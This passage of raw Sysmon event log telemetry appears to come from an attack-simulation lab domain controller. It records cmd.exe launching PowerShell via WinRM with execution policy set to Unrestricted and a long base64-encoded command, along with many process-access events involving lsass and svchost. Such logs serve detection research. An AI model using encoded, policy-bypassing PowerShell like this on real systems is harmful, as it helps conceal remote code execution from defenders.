AGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8E1F-6005-CA02-00000000A201}45044312C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.351{59A5CD1D-8E1F-6005-CC02-00000000A201}4884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.341{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 